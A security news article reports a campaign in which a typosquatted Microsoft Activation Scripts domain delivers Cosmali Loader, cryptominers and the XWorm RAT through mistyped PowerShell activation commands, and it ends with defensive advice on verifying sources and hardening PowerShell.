Windows users are facing a new malware campaign in which attackers abuse a fake Microsoft Activation Scripts (MAS) domain to deliver the Cosmali Loader malware. A single-character typo in a PowerShell activation command is enough to trigger the download and execution of malicious scripts, leading to the installation of cryptominers and remote access trojans (RATs) on compromised systems.
How a Fake MAS Domain Turned a Typo into a Malware Infection
The incident first gained attention on Reddit, where users reported unusual pop‑up messages and persistent PowerShell activity on their machines. Investigation traced these events back to a typo in the activation command for Windows, where instead of the legitimate MAS infrastructure, users were redirected to a look‑alike domain: get.activate[.]win.
This domain was registered using typosquatting — the technique of creating domains that closely resemble popular services, relying on users’ spelling mistakes. In this case, the fake domain hosted malicious PowerShell scripts instead of the legitimate open-source activation scripts expected by users.
Microsoft Activation Scripts (MAS), also known as Massgrave, is a widely known set of open‑source PowerShell scripts used to automate activation of Windows and Office (including HWID activation and KMS emulation). The project is distributed via GitHub and has an active community, which creates a perception of trust. Threat actors leveraged this trust by cloning the look and feel of the legitimate infrastructure while silently swapping in malware.
Cosmali Loader: Malware Delivery through PowerShell
Security researcher RussianPanda linked the observed pop‑ups and anomalous PowerShell behavior to Cosmali Loader, an open-source malware loader previously analyzed by G DATA researcher Karsten Hahn. Once executed, the loader is capable of fetching and launching additional payloads on the victim’s system.
In earlier campaigns and in this incident, Cosmali Loader has been observed deploying:
• Cryptominers that hijack CPU and GPU resources to mine cryptocurrency for attackers, degrading system performance and increasing power consumption.
• The XWorm remote access trojan (RAT), which grants attackers remote control over the infected host, enabling command execution, data theft, lateral movement, and the installation of further malware.
An unusual detail in this campaign is the appearance of pop‑up notifications on some infected machines, explicitly mentioning Cosmali Loader, explaining that the infection resulted from a mistyped activation domain, and advising users to reinstall Windows and check Task Manager for suspicious PowerShell processes. According to expert assessments, these messages were likely not created by the original threat actor but by an unknown third party who gained access to the Cosmali Loader command-and-control (C2) panel and attempted to warn victims.
Typosquatting on Windows Activation Commands as an Attack Vector
The use of the get.activate[.]win domain is a textbook example of a typosquatting attack. From the perspective of the browser or PowerShell, even a single incorrect character points to a completely different resource. If that resource is controlled by an attacker, the infection chain begins immediately, with no additional prompts that might alert the user.
Users are particularly vulnerable when they:
• Run PowerShell commands with elevated privileges (Run as Administrator);
• Copy activation commands from unofficial sources such as forums, comments, or third‑party websites;
• Do not verify domain names, HTTPS certificates, or source repositories before downloading scripts.
The Massgrave community has already issued a public warning about get.activate[.]win, urging users to double‑check the spelling of commands and to rely only on the project’s official GitHub repository and documented URLs.
Security Risks of Unofficial Windows Activation Tools
From Microsoft’s standpoint, MAS and similar projects are unauthorized activation tools, as they enable Windows and Office activation without a valid license by emulating KMS or exploiting other activation mechanisms. While such tools remain accessible on platforms like GitHub, the broader Microsoft ecosystem has been steadily tightening controls around unlicensed KMS activation.
This creates a dual risk for end users and organizations. Beyond violating license agreements, users are forced to trust scripts, binaries, and domains outside of Microsoft’s security and support perimeter. This significantly lowers the barrier for attackers to conduct supply chain attacks against these unofficial ecosystems, as demonstrated by the Cosmali Loader campaign.
How to Protect Windows Systems from Cosmali Loader and Similar Threats
1. Avoid unofficial activation tools. The most effective defense is to use legitimate Windows and Office licenses and rely solely on official activation mechanisms.
2. Verify domains and script sources. If third‑party tools must be used, download them only from verified sources (original GitHub repositories, official developer sites), and carefully check URLs and domain spelling before execution.
3. Harden PowerShell usage. In corporate environments, apply Constrained Language Mode, AppLocker, or similar application control technologies to restrict unsigned or untrusted PowerShell scripts, especially when run with administrative privileges.
4. Monitor PowerShell and endpoint activity. Enable detailed PowerShell logging, collect logs centrally, and use EDR/XDR solutions to detect suspicious script behavior, common for loaders like Cosmali Loader.
5. Maintain up‑to‑date security controls. Regular Windows updates, reputable endpoint protection, and network-based monitoring significantly increase the chance of blocking malicious scripts at an early stage.
The Cosmali Loader campaign built around a fake Microsoft Activation Scripts domain demonstrates how a simple typo in a command line can escalate into full system compromise. Verifying command sources, avoiding pirated activation schemes, and enforcing basic cyber hygiene are critical steps for both home users and administrators to prevent similar incidents and strengthen the overall security posture of Windows environments.
